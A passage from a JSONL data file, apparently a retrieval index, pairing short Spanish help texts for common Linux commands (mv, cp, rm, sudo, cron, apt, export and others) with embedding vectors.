0.0118, -0.04061, -0.00634, 0.00435, -0.0026, 0.0007, 0.02436, -0.04433, 0.00406, 0.07879, -0.00794, 0.00148, 0.05787, 0.06575, 0.00037, -0.03086, 0.04557, 0.0281, -0.00307, 0.01859, 0.01817, -0.05421, 0.05035, 0.03549, 0.02886, -0.01156, -0.03682, -0.01814, 0.04608, 0.0274, -0.04488, -0.02476, -0.0014, -0.02886, -0.02738, 0.03624, 0.0116, -0.04855, -0.01046, -0.01106, 0.02441, -0.08092, -0.01965, -0.06447]} +{"tipo": "tarea", "herramienta": "mv", "perfil": "LINUX", "fichero": "tarea comun: mv", "texto": "Para mover o renombrar: usa mv. mv origen destino mueve o renombra.", "v": [-0.0476, -0.2123, -0.20107, -0.11749, -0.12624, 0.18443, -0.04642, 0.02585, -0.13847, -0.30698, 0.06765, -0.19632, 0.27454, -0.00748, 0.00924, 0.07952, 0.10602, 0.04184, -0.06222, 0.0059, 0.13148, -0.11937, 0.05794, -0.03615, -0.06901, -0.00791, -0.04712, 0.03128, -0.07141, -0.08624, 0.0562, 0.08399, 0.10208, -0.11959, 0.01553, -0.08986, 0.08482, 0.00588, 0.04849, 0.0725, -0.05052, 0.01433, -0.02064, 0.07456, 0.00861, -0.09129, -0.07535, -0.0286, -0.08179, -0.00422, 0.05885, 0.14464, -0.07521, -0.04554, -0.03309, 0.01239, -0.01522, 0.00063, -0.03202, 0.01542, 0.06044, -0.00829, -0.04712, 0.03038, -0.0311, -0.01912, 0.03509, -0.1145, -0.01901, -0.07514, 0.02273, 0.02913, 0.06821, -0.00196, 0.01292, -0.01984, 0.06897, -0.07805, 0.06793, 0.03998, 0.06876, 0.08188, -0.11674, -0.02961, -0.00761, -0.07021, 0.12269, 0.01647, 0.04805, 0.03081, 0.0365, 0.01615, -0.01051, 0.06082, -0.02256, 0.01978, -0.08099, -0.00244, 0.01565, -0.01349, 0.08916, 0.03748, 0.0588, 0.06896, -0.00333, 0.0225, 0.07041, -0.07365, -0.01263, 0.07852, 0.07202, -0.01074, -0.00094, -0.02365, -0.06027, 0.06579, -0.07718, 0.03245, -0.007, -0.01377, -0.01226, -0.08554, 0.081, -0.05074, -0.05896, -0.05656, 0.03934, 0.04159, 0.02651, 0.04411, 0.09351, -0.05003, 0.08702, -0.05309, 0.02173, -0.03209, 0.11474, 0.00307, 0.06521, -0.05049, 0.0748, 0.02802, 0.00641, 0.0313, 0.04535, 0.06088, 0.07849, -0.02204, -0.02855, 0.03005, -0.00431, -0.00214, 0.03571, -0.06426, 0.05398, 0.07966, 0.00455, 0.01235, -0.03799, -0.03621, 0.03309, 0.02188, -0.04423, 0.02832, -0.07581, 0.00417, 0.02597, -0.0084, 0.07126, 0.01255, 0.02798, 0.06368, 0.05179, -0.00524, 0.02655, -0.02472, -0.01177, -0.04597, -0.00035, -0.00038, -0.01203, 0.03584, 0.08446, -0.02566, 0.02194, 0.01419, 0.05422, -0.02587, -0.03582, 0.02861, -0.01521, 0.02023, -0.01752, -0.05882, 0.00385, -0.05001, -0.00553, -0.08633, -0.03996, 0.0337, -0.01326, -0.0422, 0.03926, 0.04132, 0.0428, 0.07443, 0.00724, 0.03612, -0.01527, -0.05454, 0.00426, -0.0301, -0.01932, 0.04521, 0.00239, -0.03616, -0.08507, 0.00877, -0.01365, 0.01205, -0.07273, 0.06168, 0.0126, 0.03262, 0.00479, -0.02443, 0.02436, -0.06111, 0.01119, -0.00574, 0.0061, 0.00914, 0.03005, -0.01989, 0.05291, 0.08242, 0.03663, 0.00862, -0.00566, -0.00099, -0.0298, -0.02093, -0.05077, -0.03045, -0.01934, -0.00838, -0.04814, 0.02611, -0.01197, 0.01911, -0.01177, 0.01456, 0.00583, -0.03947, 0.00149, 0.00221]} +{"tipo": "tarea", "herramienta": "cp", "perfil": "LINUX", "fichero": "tarea comun: cp", "texto": "Para copiar ficheros: usa cp. cp origen destino. cp -r para carpetas.", "v": [0.29212, -0.13997, -0.04348, -0.00232, 0.06472, -0.32259, 0.29537, 0.0856, -0.0989, -0.04205, 0.0705, -0.02941, -0.17565, -0.0632, -0.01032, -0.06296, -0.04964, 0.16189, 0.09365, -0.07725, -0.00757, -0.03657, 0.01838, -0.02892, -0.07726, 0.11297, 0.06304, -0.02705, -0.04901, -0.07138, 0.12197, 0.1565, 0.11761, 0.03239, -0.02974, -0.01628, -0.08315, -0.05656, -0.04921, 0.0119, 0.04566, 0.13959, -0.07384, 0.11522, -0.02193, -0.08019, 0.00171, -0.02437, -0.02495, -0.02708, 0.0506, -0.07682, -0.13789, -0.07822, -0.0719, 0.04212, -0.00984, 0.02716, 0.05946, -0.00868, 0.01034, 0.14144, -0.06388, 0.06147, -0.08107, 0.0039, -0.00033, -0.08134, -0.07274, -0.00229, -0.09682, 0.09659, 0.06896, -0.05451, 0.12232, -0.06173, 0.00574, -0.10463, 0.05012, -0.02529, 0.0123, -0.01543, -0.07604, -0.05179, -0.01661, -0.0678, 0.10019, 0.05897, -0.08268, -0.07809, 0.05379, -0.03164, -0.0386, 0.03893, -0.09335, -0.04434, -0.08116, -0.03581, 0.0239, 0.05053, 0.02764, 0.06487, -0.00338, 0.10232, -0.03701, 0.03021, 0.05885, 0.00683, -0.02247, -0.01469, 0.01647, 0.06704, -0.01584, 0.01477, -0.05753, -0.04644, -0.00032, 0.0253, 0.01644, -0.03415, -0.09507, -0.03666, -0.00523, -0.0086, -0.01147, 0.00545, 0.03276, 0.06329, -0.05109, 0.03577, -0.08376, 0.05413, -0.07929, -0.01088, 0.02691, -0.00417, -0.03777, -0.01335, 0.06099, -0.00137, 0.03249, 0.01895, -0.08064, -0.01448, 0.02522, 0.00041, 0.02691, -0.07382, -0.02707, -0.03076, 0.05238, -0.01593, -0.02173, -0.04068, 0.02271, 0.06932, 0.00426, -0.04836, 5e-05, 0.03343, 0.03471, 0.01086, -0.02246, -0.00687, 0.0051, -0.00191, 0.00171, -0.0338, 0.03248, 0.04172, -0.03231, 0.0235, 0.0517, -0.04982, 0.03006, -0.02923, 0.03574, -0.0058, -0.0149, 0.02981, -0.04894, 0.03283, -0.00074, 0.03648, -0.01765, -0.0433, 0.03401, 0.03151, -0.00305, -0.04436, 0.03235, 0.03762, 0.0241, -0.02288, -0.03038, -0.02181, 0.01022, -0.06769, -0.02316, -0.00549, -0.06593, 0.01584, -0.01385, -0.03742, 0.04981, 0.01138, 0.02084, 0.01884, -0.07884, 0.01125, 0.00302, -0.04756, 0.03567, -0.01302, -0.01619, -0.03227, -0.02838, 0.02723, 0.02112, -0.06432, 0.00286, 0.06876, 0.06197, 0.01409, 0.0344, 0.03056, 0.03396, -0.02442, 0.02809, 0.03183, -0.01747, 0.0231, 0.02761, -0.02765, 0.07491, -0.01595, -0.01998, -0.01635, -0.02112, -0.00722, -0.0236, -0.00403, -0.05817, -0.0117, -0.01594, -0.01923, -0.06378, 0.05143, 0.03669, -0.04799, -0.00113, -0.01096, 0.03376, -0.05424, -0.02086, -0.06563]} +{"tipo": "tarea", "herramienta": "rm", "perfil": "LINUX", "fichero": "tarea comun: rm", "texto": "Para borrar ficheros: usa rm. rm fichero. rm -r carpeta. CUIDADO: no hay papelera, es definitivo.", "v": [0.17548, -0.22067, -0.05243, -0.07983, 0.1258, -0.05501, 0.06255, 0.07157, -0.0598, -0.10961, -0.04107, -0.13968, 0.16403, -0.12086, 0.18206, 0.03239, -0.21294, 0.17026, -0.00567, -0.08829, 0.08633, -0.00571, -0.05448, 0.11225, -0.15361, 0.05868, 0.05751, 0.00392, 0.00052, -0.05974, 0.24614, 0.10822, 0.14891, -0.06194, -0.11858, -0.01012, 0.08778, -0.10541, -0.08729, 0.10996, 0.09119, 0.18505, -0.01227, 0.1776, -0.01871, -0.06696, 0.04634, 0.00289, 0.10332, 0.04947, -0.00111, -0.00051, -0.0351, -0.0095, -0.05008, -0.04161, 0.1062, -0.01929, -0.01331, 0.05876, -0.02975, -0.01381, 0.0867, 0.04244, -0.06968, 0.02021, 0.09181, -0.08953, 0.00852, 0.04955, -0.07359, 0.00557, 0.18668, -0.02509, -0.00658, -0.04142, -0.06678, -0.09772, -0.00132, 0.08308, -0.04328, -0.06959, -0.00665, -0.01267, 0.00627, -0.04901, 0.08135, 0.0077, -0.03644, -0.01607, 0.00256, -1e-05, -0.07981, -0.03494, 0.01515, 0.01311, -0.0142, -0.05925, 0.04171, -0.02188, 0.01539, -0.02414, -0.09555, 0.05295, -0.03195, -0.0121, -0.03138, 0.0112, -0.00933, 0.02839, 0.06188, -0.01251, 0.00992, 0.08371, -0.06128, 0.02659, 0.05907, 0.03108, -0.06582, -0.06069, -0.00747, 0.00598, 0.01106, 0.02495, 0.05588, -0.04173, 0.01283, 0.05078, -0.09124, 0.03928, -0.04863, 0.01335, -0.09388, -0.01842, -0.04023, 0.02993, 0.01964, -0.04106, 0.0115, -0.08489, 0.06443, 0.01836, -0.11216, 0.09054, -0.0078, 0.01688, 0.05595, 0.05945, -0.02986, -0.09836, 0.03183, -0.00948, -0.01619, -0.00357, 0.06894, 0.0434, 0.01274, -0.0161, -0.0303, -0.01758, 0.00323, 0.01012, 0.03943, 0.01739, 0.01836, 0.03408, 0.00507, 0.0182, 0.03237, 0.05484, -0.00631, -0.05048, 0.03112, -0.04972, -0.01743, 0.00426, 0.07079, 0.03863, -0.0037, 0.01029, 0.02206, -0.03073, 0.02619, 0.0828, -0.00853, 0.0086, 0.01684, -0.03717, 0.01963, -0.01392, 0.0295, 0.01856, 0.01498, -0.00927, 0.01249, -0.01677, 0.02076, -0.05338, -0.01558, 0.06468, -0.01909, 0.00357, 0.028, -0.03991, -0.03006, 0.00319, 0.0014, 0.00188, -0.0539, -0.04448, 0.01771, 0.01065, 0.00556, -0.03126, 0.01882, 0.00571, -0.05168, 0.05704, 0.08331, -0.04606, -0.01468, 0.03869, -0.00255, -0.02137, 0.06714, 0.00826, 0.03323, -0.0372, -0.02467, 0.0126, 0.01306, -0.00751, 0.04381, 0.00312, 0.01357, -0.02453, -0.00384, -0.02904, -0.00937, -0.03184, -0.0128, -0.02298, -0.03127, 0.01447, 0.01941, 0.0229, -0.03809, 0.02965, 0.03322, -0.02331, -0.02305, -0.06926, -0.0086, -0.03588, -0.04257, 0.00833]} +{"tipo": "tarea", "herramienta": "sudo", "perfil": "LINUX", "fichero": "tarea comun: sudo", "texto": "Para dar permisos de administrador a un comando: usa sudo. sudo comando lo ejecuta como root. Pide tu contraseña.", "v": [0.10911, 0.00452, -0.14051, -0.16865, 0.04854, -0.06674, 0.05524, -0.10493, -0.10568, 0.02274, -0.05439, -0.01354, 0.08222, -0.11846, -0.03867, -0.07397, 0.07918, 0.05995, 0.01444, -0.04873, 0.0738, 0.05159, 0.12369, 0.03032, 0.02264, 0.05888, 0.17317, 0.04647, -0.08413, -0.12267, 0.00504, 0.07663, 0.08703, -0.06749, -0.05717, 0.07585, -0.02681, 0.02621, -0.00621, 0.24619, -0.06921, 0.09106, -0.18568, 0.05569, -0.06147, -0.03471, 0.06208, -0.0392, 0.13122, -0.01746, 0.00086, -0.09043, -0.06751, -0.06477, 0.06053, 0.03725, 0.1438, -0.11962, 0.01694, 0.04194, -0.1314, -0.0839, 0.09883, 0.13672, -0.06652, -0.0292, 0.00399, -0.10262, -0.04969, 0.0852, -0.06735, 0.08557, -0.09775, 0.08664, 0.07657, -0.04387, -0.04056, 0.02539, 0.09618, 0.01833, -0.01312, 0.01727, -0.09462, -0.00787, -0.13621, -0.08778, -0.11786, -0.10847, 0.00728, 0.00608, 0.02727, -0.02548, 4e-05, 0.01934, 0.08703, 0.01785, 0.02738, 0.07563, -0.01845, 0.01471, 0.0317, 0.04418, -0.06416, 0.15498, 0.08573, 0.03701, 0.0468, -0.00748, -0.00132, 0.00463, 0.01571, -0.04824, 0.00605, -0.02186, -0.04739, -0.05223, -0.07163, -0.08996, -0.01227, -0.05576, -0.12715, -0.03873, 0.02153, 0.07537, 0.01755, -0.03586, -0.05369, 0.07008, 0.04109, -0.01223, -0.02172, -0.05799, 0.06691, -0.01435, -0.06151, 0.16464, -0.01414, -0.04812, -0.1064, -0.08335, -0.04128, 0.02084, 0.02872, -0.01002, 0.10964, 0.03108, 0.00278, -0.06192, -0.04677, 0.00763, 0.00244, 0.02409, -0.04659, 0.04193, -0.01143, 0.02654, -0.04407, -0.02801, 0.00872, 0.07659, 0.01374, -0.07103, -0.0844, 0.06093, -0.05064, -0.03719, -0.03846, -0.01257, 0.03107, 0.01773, -0.05265, 0.07872, -0.01627, -0.03337, 0.02065, -0.08303, 0.03432, -0.07852, 0.0083, 0.02541, 0.02492, 0.03106, -0.02662, -0.00707, -0.04613, -0.02218, 0.01492, 0.01286, -0.02277, 0.00678, 0.03326, 0.05759, 0.01472, -0.02986, 0.04862, 0.01747, -0.02644, -0.04223, -0.06032, -0.04979, -0.01713, 0.06442, -0.0205, -0.05086, 0.04104, -0.07057, -0.01716, 0.02552, -0.02791, 0.0193, 0.01069, -0.00718, 0.0573, -0.00176, -0.05135, -0.0417, -0.01632, 0.03018, 0.00492, -0.03479, 0.00341, 0.06148, 0.06735, 0.01255, 0.00344, -0.02811, -0.02647, -0.02318, 0.04506, 0.0566, -0.06675, 0.02592, -0.01255, -0.01449, 0.05443, -0.04044, 0.00719, -0.00444, -0.00752, -0.0157, 0.00145, 0.02928, -0.01504, -0.09119, -0.07209, -0.01267, -0.05702, 0.04488, -0.00972, -0.02462, 0.01814, 0.0357, -0.01412, -0.04047, -0.04812, -0.03327]} +{"tipo": "tarea", "herramienta": "history", "perfil": "LINUX", "fichero": "tarea comun: history", "texto": "Para ver el historial de comandos: usa history. history lista lo tecleado. Ctrl+R busca.", "v": [0.11868, 0.02737, -0.03552, -0.04636, -0.04052, -0.24582, 0.05129, -0.07104, 0.03355, 0.0018, -0.1281, -0.2175, 0.0732, -0.02626, 0.0415, -0.01353, 0.04361, 0.0526, 0.03785, -0.15383, -0.04285, -0.03055, 0.02937, -0.02588, -0.10302, -0.07071, -0.05412, -0.05478, -0.06783, -0.03446, 0.00609, 0.10102, 0.00374, -0.09325, -0.03553, 0.04791, 0.10069, 0.01373, -0.05801, 0.17225, -0.06636, 0.08564, -0.13402, 0.13048, -0.03288, -0.11722, 0.01814, 0.08825, 0.0134, -0.07461, 0.04617, -0.01042, -0.14746, 0.02861, 0.0258, -0.01742, 0.06793, 0.07581, -0.0921, 0.00582, 0.0096, -0.00236, -0.04084, 0.11491, -0.09016, -0.08423, 0.05647, -0.13896, 0.00485, 0.15648, -0.11582, 0.04619, -0.05978, 0.01936, 0.01161, -0.07874, 0.06452, -0.02169, 0.09158, 0.06443, -0.07328, 0.01934, -0.07165, -0.01423, -0.05994, -0.04308, -0.06028, 0.01474, 0.00223, 0.00813, 0.08873, 0.01826, -0.01051, 0.00618, 0.13216, -0.00978, 0.02134, -0.01025, 0.1009, 0.0178, 0.01876, 0.00478, -0.01337, 0.19083, 0.10623, 0.00975, 0.07329, -0.05809, -0.03148, 0.01645, -0.00158, -0.11587, -0.04741, 0.09811, -0.01373, 0.01727, 0.01583, -0.03947, -0.00255, -0.10208, -0.11564, 0.05963, -0.04074, 0.1122, -0.06024, 0.07097, 0.02155, 0.02345, 0.01606, 0.06486, 0.00591, 0.05218, -0.00353, -0.11119, 0.0081, 0.07517, 0.04355, 0.02037, -0.05858, -0.06643, 0.09921, 0.11587, -0.085, 0.04041, 0.06041, -0.01319, 0.03588, 0.0078, -0.03395, -0.01173, 0.01792, 0.00093, 0.03332, 0.017, 0.05304, -0.06185, 0.02796, -0.04443, -0.01398, -0.01129, 0.01121, -0.01419, -0.06301, 0.02653, 0.02976, -0.06733, -0.03623, -0.02483, 0.05081, -0.05546, 0.03447, 0.00615, 0.00626, -0.07538, -0.026, -0.00238, 0.04377, -0.02367, 0.03187, 0.05519, 0.03089, 0.03654, 0.02147, 0.02955, -0.0262, -0.1145, 0.00285, -0.0081, 0.02493, -0.06695, -0.01726, -0.01266, 0.01516, 0.02936, -0.00618, 0.04579, 0.01236, -0.06654, -0.06157, -0.03377, -0.03828, 0.01296, 0.06434, -0.00604, 0.02977, 0.0496, 0.03496, 0.02888, 0.01284, -0.02286, 0.08283, 0.03725, 0.05456, 0.07019, -0.06401, -0.08988, -0.05906, 0.00433, -0.03636, -0.12209, 0.02424, 0.04133, 0.06241, -0.01123, 0.0455, -0.02675, 0.00912, -0.00558, -0.02219, -0.04624, -0.01042, 0.11809, -0.01614, -0.01555, 0.01546, 0.01415, -0.002, -0.05036, -0.00112, -0.04891, -0.01738, 0.04176, -0.04275, 0.00163, -0.03453, -0.04381, -0.06083, 0.06479, 0.02874, -0.04466, 0.0119, -0.00735, 0.01604, -0.10316, 0.0518, -0.01791]} +{"tipo": "tarea", "herramienta": "cron", "perfil": "LINUX", "fichero": "tarea comun: cron", "texto": "Para programar una tarea periodica: usa cron. crontab -e edita tus tareas. Formato: min hora dia mes diasemana comando.", "v": [-0.01414, -0.0481, -0.06999, -0.14996, 0.10809, -0.06917, 0.09578, 0.06112, -0.07328, 0.00437, -0.25568, -0.03912, 0.11657, -0.07241, 0.04995, 0.07331, 0.20667, 0.0189, 0.12542, -0.01103, -0.01655, 0.03566, 0.07599, 0.02243, -0.00326, -0.07405, -0.0044, -0.06329, -0.10038, 0.04802, 0.05031, 0.11479, 0.18842, -0.12453, -0.0347, 0.08758, -0.00392, 0.03286, -0.06127, 0.1658, -0.17809, 0.16145, -0.04651, 0.0372, 0.03716, -0.03413, 0.08915, 0.04434, -0.04462, -0.01268, -0.01397, 0.00074, 0.0092, 0.0471, -0.03025, -0.04819, 0.10655, -0.10581, -0.13152, 0.03741, 0.07714, 0.08244, -0.04432, 0.04913, 0.05415, 0.06646, -0.05746, -0.11806, -0.02858, 0.10867, -0.04194, 0.00753, -0.02469, -0.03009, 0.06071, -0.06657, -0.08168, -0.01881, 0.09427, -0.01922, -0.06593, 0.05413, 0.00639, 0.04254, -0.15337, -0.00284, 0.0037, 0.00077, -0.10141, 0.02138, 0.04675, -0.03069, -0.01412, 0.02255, 0.11083, -0.00995, 0.02609, 0.01944, 0.06825, 0.02194, 0.06188, -0.06467, -0.0552, 0.11209, -0.05263, 0.04927, 0.05343, 0.09135, 0.03052, 0.01355, 0.07107, -0.0389, -0.02515, -0.01626, -0.08068, 0.0225, -0.03272, -0.00676, 0.00896, -0.0913, -0.02193, 0.04602, 0.00639, 0.11234, 0.05275, -0.08791, 0.03998, -0.00294, 0.0381, 0.00878, -0.0077, 0.04122, 0.07267, -0.00659, -0.04786, 0.1335, 0.05501, -0.06317, -0.09326, -0.10542, -0.07168, 0.06971, -0.04882, 0.01196, 0.15019, 0.04157, 0.01011, -0.0452, -0.06633, 0.00065, 0.03104, -0.00568, 0.03189, -0.01633, -0.01485, -0.07076, -0.02327, 0.01195, -0.0497, -0.01164, 0.0329, -0.00926, 0.02017, -0.04732, -0.05677, -0.06643, 0.0567, 0.01394, -0.01034, -0.00028, -0.00813, 0.03985, 0.03317, -0.08141, 0.07199, -0.0819, 0.00495, 0.00476, 0.02076, 0.0593, -0.02843, 0.03949, 0.07967, 0.01664, -0.09421, -0.07034, 0.01457, 0.01085, -0.01615, -0.05468, 0.05479, -0.00539, 0.01615, -0.07456, 0.06644, 0.02917, -0.04174, -0.00821, -0.02378, 0.04589, -0.01267, 0.01538, -0.0124, 0.05305, 0.02979, 0.02397, -0.01537, 0.10667, 0.02241, 0.02075, 0.04742, 0.00342, -0.05858, 0.03228, -0.04583, -0.04434, -0.0123, 0.01352, 0.02104, 0.02631, 0.03135, -0.00484, 0.04798, -0.06027, -0.00503, -0.03014, 0.06268, 0.0491, 0.05877, 0.04102, -0.06091, 0.01014, -0.0171, -0.03005, 0.04798, -0.03292, 0.03828, -0.01318, 0.03637, -0.07339, -0.00226, 0.01446, -0.02516, -0.01115, -0.10348, -0.01973, -0.03503, -0.00274, -0.04687, -0.01119, -0.03009, 0.01827, 0.01725, -0.04832, -0.00254, -0.04056]} +{"tipo": "tarea", "herramienta": "sensors", "perfil": "LINUX", "fichero": "tarea comun: sensors", "texto": "Para ver la temperatura y el hardware: usa sensors. sensors muestra temperaturas. lscpu la CPU, lspci los dispositivos.", "v": [0.2117, -0.05734, -0.10762, -0.16019, -0.06366, -0.16288, -0.05451, -0.11886, 0.08474, 0.02384, -0.15029, 0.03607, 0.00914, -0.03066, 0.01543, -0.05396, 0.02273, -0.06846, 0.04614, -0.01421, -0.04205, -0.02009, -0.13038, -0.13786, -0.06303, 0.14352, 0.05867, -0.00404, -0.10831, -0.0122, 0.01727, -0.00249, 0.07973, -0.00644, -0.12389, -0.07704, -0.05525, -0.00149, 0.07894, 0.10918, -0.009, -0.00556, 0.06032, -0.14817, 0.08367, -0.08915, 0.03962, -0.00403, 0.02319, -0.07837, -0.08436, 0.0773, 0.04094, 0.07758, -0.07716, -0.01163, 0.07958, 0.06259, 0.16567, -0.13224, 0.02169, 0.05773, 0.05336, -0.04952, -0.03736, -0.03168, -0.07852, 0.01291, 0.04111, -0.03898, -0.015, -0.03533, -0.05357, -0.08662, 0.07574, 0.05254, -0.07073, 0.03942, 0.10133, -0.04881, 0.01198, 0.09297, -0.00966, -0.07368, -0.02265, -0.11329, 0.09755, -0.03032, 0.01847, -0.00634, 0.00997, 0.14335, 0.04893, 0.04771, 0.12102, -0.00405, 0.05652, 0.07775, 0.04025, 0.14997, 0.10288, 0.01745, -0.02624, 0.13498, 0.01126, -0.0269, 0.08414, -0.06732, 0.0631, -0.10071, -0.00194, -0.05966, -0.06433, 0.0107, -0.01298, 0.01315, -0.00069, -0.15304, -0.03685, 0.00401, -0.06321, -0.02468, 0.11041, -0.04207, -0.02658, 0.01039, -0.10675, -0.0911, 0.00644, 0.07089, -0.00627, -0.12591, -0.00477, 0.02656, -0.01132, 0.05373, -0.00694, 0.01516, -0.02303, -0.02977, -0.03137, 0.09355, 0.02937, -0.04903, 0.03888, -0.00626, 0.04012, 0.04238, -0.05605, -0.01083, 0.00941, -0.02615, 0.00059, 0.00557, -0.03718, 0.0095, 0.06577, -0.09824, -0.09313, -0.05856, -0.00425, 0.10075, -0.01315, -0.02298, -0.05669, 0.0464, 0.02166, -0.01057, 0.13813, -0.0037, -0.01579, 0.11156, -0.00057, 0.06809, 0.07255, -0.01651, -0.01415, -0.05557, 0.03692, -0.02957, -0.01757, 0.08765, 0.0232, -0.04059, 0.00756, 0.06007, 0.00345, -0.04206, 0.01391, -0.02424, 0.02925, 0.0438, -0.00568, 0.08847, 0.05444, -0.01544, 0.03407, -0.01122, -0.02291, 0.02905, -0.0199, 0.01629, -0.03036, -0.05717, -0.01141, -0.00028, -0.0565, 0.03082, 0.02428, -0.04338, -0.04092, -0.06692, 0.02613, -0.02549, -0.05032, -0.0234, -0.00283, 0.03542, -0.02324, -0.03607, 0.07637, 0.0222, -0.00372, 0.01664, -0.02078, 0.04849, 0.05175, 0.04136, 0.03325, -0.10355, -0.07147, 0.06001, 0.01537, -0.02516, 0.05843, 0.02868, -0.02695, -0.01698, -0.05292, -0.01968, 0.00883, 0.06118, 0.00434, -0.05711, 0.00838, 0.02414, -0.00214, -0.0011, 0.00785, -0.08861, 0.00302, 0.00916, 0.00701, -0.05644, -0.00743, -0.05864]} +{"tipo": "tarea", "herramienta": "apt", "perfil": "LINUX", "fichero": "tarea comun: apt", "texto": "Para gestionar paquetes en Debian: usa apt. apt install paquete, apt update actualiza la lista, apt upgrade el sistema.", "v": [0.15938, 0.04044, -0.21401, -0.21054, 0.09159, -0.09141, 0.04114, -0.04932, -0.23497, 0.0357, -0.09996, -0.12761, -0.1248, 0.04604, -0.06225, -0.11863, -0.14433, -0.04868, 0.04617, -0.00048, 0.06989, 0.12211, -0.07127, -0.09599, -0.06563, 0.17674, 0.12594, 0.02083, -0.06782, -0.02318, 0.07288, 0.02371, -0.05217, -0.05146, -0.06948, -0.03519, 0.01078, -0.04809, 0.06548, 0.00339, 0.04387, -0.00945, 0.01548, 0.1483, -0.04387, -0.00438, 0.07267, 0.02563, 0.06239, -0.13882, -0.10436, -0.0066, -0.09384, -0.0063, -0.0047, 0.00567, 0.12298, -0.11935, 0.0666, -0.05099, -0.06044, 0.05299, -0.03766, -0.0083, 0.10689, 0.00911, -0.06949, -0.06849, -0.18238, 0.04994, -0.02538, 0.05062, 0.10329, 0.05236, -0.07899, 0.03803, -0.03054, -0.08492, 0.00643, 0.06732, -0.00104, -0.04733, -0.00315, 0.00365, -0.12029, -0.15971, 0.02455, 0.05875, -0.02045, -0.03776, 0.03188, -0.07032, -0.07504, 0.01015, 0.13938, 0.00679, 0.049, -0.08904, 0.03334, 0.0015, -0.05962, 0.04329, -0.01405, 0.08197, -0.0133, -0.00498, 0.07799, -0.02258, 0.05669, -0.05232, 0.03759, 0.03333, 0.01371, -0.06248, -0.07326, -0.00239, -0.02536, 0.0287, -0.04522, -0.02078, -0.09941, -0.05641, -0.06898, -0.00875, 0.04022, -0.02145, 0.03592, 0.0519, 0.01722, -0.02607, -0.05774, -0.05223, 0.07862, 0.00528, -0.0682, -0.02972, 0.03935, -0.00476, -0.0253, -0.01301, -0.0395, 0.08975, 0.01379, 0.03004, 0.11374, 0.01905, -0.02158, -0.03701, 0.03148, 0.03284, 0.09672, 0.03469, 0.03379, 0.01181, -0.01599, -0.01085, 0.01991, -0.0713, 0.00961, 0.03147, 0.03222, -0.04469, -0.04941, 0.05321, -0.10044, 0.05027, 0.04487, 0.02418, 0.07291, 0.02381, -0.01783, 0.02653, -0.01628, -0.01168, 0.01828, -0.08202, -0.0278, -0.0798, 0.01211, 0.02588, -0.02365, 0.02793, 0.03726, -0.02637, -0.05278, -0.03321, -0.04109, 0.0173, 0.02605, 0.01085, -0.02942, 0.02039, -0.00449, -0.0077, 0.03134, -0.02714, -0.03093, -0.05156, -0.05951, 0.0347, -0.06463, -0.00545, -0.00506, -0.08665, 0.03476, 0.0337, 0.03765, 0.01172, -0.01429, 0.06287, 0.0359, 0.00358, 0.06365, 0.00948, -0.0402, -0.06218, 0.01479, 0.03012, 0.07341, -0.0191, -0.01357, -0.01203, 0.04354, -0.05036, -0.03856, -0.05299, -0.03285, 0.06999, 0.04133, -0.01, -0.01416, 0.04308, 0.00268, -0.03642, 0.03581, 0.01975, 0.04184, 0.027, -0.04335, 0.00275, -0.00527, 0.08427, 0.00853, -0.04462, -0.04493, -0.07959, -0.03984, -0.00941, 0.01028, -0.04535, -0.09366, 0.05686, 0.00063, -0.03965, 0.00683, -0.00155]} +{"tipo": "tarea", "herramienta": "export", "perfil": "LINUX", "fichero": "tarea comun: export", "texto": "Para ver o cambiar variables de entorno: usa export. export VAR=valor la pone. env las lista. echo $VAR la muestra.", "v": [0.0362, -0.06401, -0.15341, -0.15803, -0.06844, 0.0701, 0.08995, -0.13891, 0.04825, -0.22771, -0.06182, -0.23587, -0.01434, 0.0695, 0.02395, 0.07631, 0.04242, -0.06837, 0.12326, 0.05896, 0.06569, -0.09922, -0.00439, -0.10366, -0.04803, 0.26098, -0.24072, -0.032, -0.09231, 0.1295, 0.03795, 0.08172, 0.11808, -0.05369, -0.01052, 0.03628, 0.11536, -0.02372, 0.15262, 0.09593, 0.07924, -0.03603, 0.04703, -0.05503, 0.00263, -0.15431, 0.00941, 0.14455, 0.07299, -0.03, 0.0619, -0.01919, -0.02862, 0.01906, 0.1441, 0.05243, -0.00513, -0.02523, -0.04713, -0.07604, -0.02933, 0.04155, 0.09819, 0.01695, 0.0617, 0.04859, -0.10866, -0.00808, -0.0083, -0.0002, -0.06002, 0.01543, -0.03544, -0.02402, 0.05792, -0.00421, 0.01928, -0.07294, 0.0294, 0.03552, -0.01387, -0.03388, 0.05608, 0.05693, 0.01642, -0.09136, 0.02373, -0.05529, 0.11738, -0.0356, -0.02878, -0.0399, -0.0126, -0.02502, 0.02328, -0.01603, -0.11934, 0.05167, -0.03557, -0.08095, 0.0121, 0.03712, -0.05375, 0.08594, 0.0961, 0.02942, 0.05391, 0.01297, -0.09242, 0.05408, 0.06955, -0.01686, -0.04202, -0.04867, -0.03423, 0.00044, 0.00089, 0.04606, -0.0328, 0.00767, -0.00825, -0.09025, 0.01297, -0.02235, 0.01944, -0.06448, -0.03929, 0.05582, 0.06676, 0.07641, -0.0096, 0.04116, 0.01222, -0.0286, -0.01338, 0.0186, 0.06683, -0.0065, -0.05097, -0.07577, -0.03558, -0.02901, 0.02683, 0.00937, 0.02947, -0.00645, -0.02704, -0.01548, -0.07146, -0.00176, 0.07075, -0.01873, -0.02393, -0.06898, -0.00712, -0.01549, 0.0157, 0.00275, -0.04783, -0.02748, -0.00648, 0.00486, 0.02542, -0.03804, 0.00989, 0.03578, 0.05246, -0.03106, 0.08381, -0.0318, -0.05919, 0.02376, -0.00225, -0.04528, -0.0252, 0.00749, 0.00321, -0.03718, -0.05036, 0.00544, 0.02735, 0.04781, 0.01704, -0.04197, -0.03194, 0.00984, 0.06574, 0.0376, -0.04108, -0.044, 0.01324, 0.09801, 0.04562, -0.04035, 0.04768, 0.01529, 0.01874, -0.08172, -0.03864, -0.05326, 0.01543, -0.00972, 0.10893, -0.08376, 0.04054, 0.07615, -0.03208, 0.02322, -0.03119, -0.03962, 0.01791, 0.00991, -0.00537, 0.09743, -0.04756, 0.02461, -0.0859, 0.05913, 0.02435, -0.02746, -0.04716, 0.03377, 0.02928, -0.04521, -0.02631, 0.07636, -0.00622, 0.00109, 0.02133, -0.01397, -0.07205, 0.04299, 0.01933, -0.02301, -0.00613, -0.02887, -0.03073, -0.03609, -0.03986, -0.06119, 0.01328, 0.00912, -0.06922, -0.01124, 0.00437, -0.0021, -0.01353, 0.02546, 0.08579, -0.04446, -0.03336, -0.00996, 0.00704, -0.05587, 0.01936, -0.01796]} +{"tipo": "tarea", 